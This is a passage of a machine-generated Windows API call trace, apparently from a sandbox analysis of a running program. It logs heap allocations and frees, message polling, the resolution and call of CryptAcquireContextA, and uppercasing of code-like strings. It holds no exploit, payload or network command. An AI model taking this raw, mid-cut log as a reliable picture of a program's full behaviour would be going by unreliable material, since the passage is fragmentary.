hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0188.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.843] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0188.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0188.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0188.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.844] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0188.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.844] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0188.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.846] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.847] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.847] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0188.847] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.847] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0188.848] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.848] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.848] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.848] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.848] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.848] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.848] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.848] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.848] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.849] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.849] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.849] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.849] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.849] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.849] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.849] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0188.849] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0188.849] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.850] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0188.850] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.850] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.850] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.851] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.851] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.851] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.851] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.852] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.852] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0188.852] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.852] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.852] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.852] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.852] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.853] PeekMessageW (in: lpMsg=0x8bf160, 